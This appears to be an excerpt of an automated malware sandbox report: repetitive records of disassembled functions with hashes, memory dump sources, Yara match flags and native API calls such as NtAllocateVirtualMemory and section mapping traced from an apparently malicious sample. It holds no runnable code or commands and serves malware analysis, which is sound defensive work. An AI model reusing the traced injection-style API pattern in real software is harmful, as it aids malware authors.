                                                • Instruction Fuzzy Hash: E52191B2900219ABCB24EF58CD41AEF73BCBB90700F548555FC4AD7141DB70AA5A8BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA22F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 00AA2328
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
                                                • RTL: Resource at %p, xrefs: 00AA230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                • Instruction ID: 1317fc116970ccd443843b3140a28835e8de914156106ca3ee5e25088ffbf05f
                                                • Opcode Fuzzy Hash: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                • Instruction Fuzzy Hash: F9513572A007026BDF15EB38CD91FA673A8EF59760F104229FD49DF281EB61EC4187A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AA248D
                                                • RTL: Re-Waiting, xrefs: 00AA24FA
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AA24BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                • Instruction ID: a9617e94e8cd553535f009ceadff3816f547e7db78c8739b9d94108c324ab5e5
                                                • Opcode Fuzzy Hash: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                • Instruction Fuzzy Hash: 4541F375A00304BFCB24EB68CD85FAA77B8EF89720F208615F5559B2C1D734E95187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: d320c53a9a8fa5328728e580ca10bc981a117142d8afb24f24fe5635d5ed1fc2
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: CE915A31E0020AEFDF28DF98CC456AEB7B4EB55314F24C47AD419A72A2E7305B85CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0226691F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686407352.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                • Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                • Instruction ID: e63ad6de2e113ecbe4adff50e3a0c4582dd6309a6b1764ff4eb72e53f12d9dbc
                                                • Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                • Instruction Fuzzy Hash: 73F15171528A8C8FDB65EFA8C898AFEB7E1FF98304F40462AD44AD7254DF349581CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686407352.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                Similarity
                                                • API ID: Section$CloseCreateView
                                                • String ID: @$@
                                                • API String ID: 1133238012-149943524
                                                • Opcode ID: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                                • Instruction ID: 1100e7a90bfd596cfafe1c4aed5de0f37b107fe3eee4fde25d6f5095f4370ca6
                                                • Opcode Fuzzy Hash: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                                • Instruction Fuzzy Hash: F261B37021CB488FCB58DF58D8956BAB7E1FB98314F50062EE58AC3651DF35D481CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686407352.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                Similarity
                                                • API ID: Section$CreateView
                                                • String ID: @$@
                                                • API String ID: 1585966358-149943524
                                                • Opcode ID: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                                • Instruction ID: 2e0fdf2c29877c6b155b3409cb842a04763528227524fdf426e220db90f5a199
                                                • Opcode Fuzzy Hash: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                                • Instruction Fuzzy Hash: 1A517E70618B088FD758DF58D8956BABBE0FF88304F50062EE98AC3691DF35D581CB86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0226691F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686407352.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                • Opcode ID: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                                • Instruction ID: c02a1783ff45f2d76468dda0a8d1762003933990e9d9aa1b6fae311c847b6ea0
                                                • Opcode Fuzzy Hash: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                                • Instruction Fuzzy Hash: 44516E71924A8C8FDB69EF68C8986EEB7F1FB98304F40422ED44AD7214DF309642CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 78e0bda7892d8ba9f6a9c1edd60b19f996a4524dc54d053a33204d61a740ad0e
                                                • Instruction ID: 9402214b13ab55c4a2def4b573bb882d509b770863f816ab142b9a3f63cdce98
                                                • Opcode Fuzzy Hash: 78e0bda7892d8ba9f6a9c1edd60b19f996a4524dc54d053a33204d61a740ad0e
                                                • Instruction Fuzzy Hash: A3F0F4B2204148ABCB08CF98DC84CEB77ADBF8C314B15864CFA1CD3202D630E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: =
                                                • API String ID: 3535843008-3560468456
                                                • Opcode ID: 1ea310429a019c6bb2369700f758dfa025038dfc83d1d6bb5f67aa881d8c0fe4
                                                • Instruction ID: f1e35145ae0be8bce2907f929d0a3e77b7cd64fef576abefb08aae7b1d81ac86
                                                • Opcode Fuzzy Hash: 1ea310429a019c6bb2369700f758dfa025038dfc83d1d6bb5f67aa881d8c0fe4
                                                • Instruction Fuzzy Hash: 0FE086716005007BDB20EFA4CC86EDB7728EF443A0F114555B91CDB343D631A5008BD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: =
                                                • API String ID: 3535843008-3560468456
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 91a191086e0b7a468e11a6e6e0f9e6b3c9e2a0ca5fca3b99fbcd3db8edb97b35
                                                • Instruction ID: e6a6e4e7c20657b2a04bbcb922873a67e7a912eb26d4432f648d538f9fffb574
                                                • Opcode Fuzzy Hash: 91a191086e0b7a468e11a6e6e0f9e6b3c9e2a0ca5fca3b99fbcd3db8edb97b35
                                                • Instruction Fuzzy Hash: 74F092B6210108ABCB14DF89DC85EEB77A9EF8C754F158648BA1D97241DA30E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: bed45cf130e08865842418422f5209c84d04630db3e9acde41b4be393811b9d6
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: 6CF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 40387beaf1419a180c31e2cff737e2f724b9fe9c60f55009042e5faa2de09132
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 76F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897341CA30F810CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
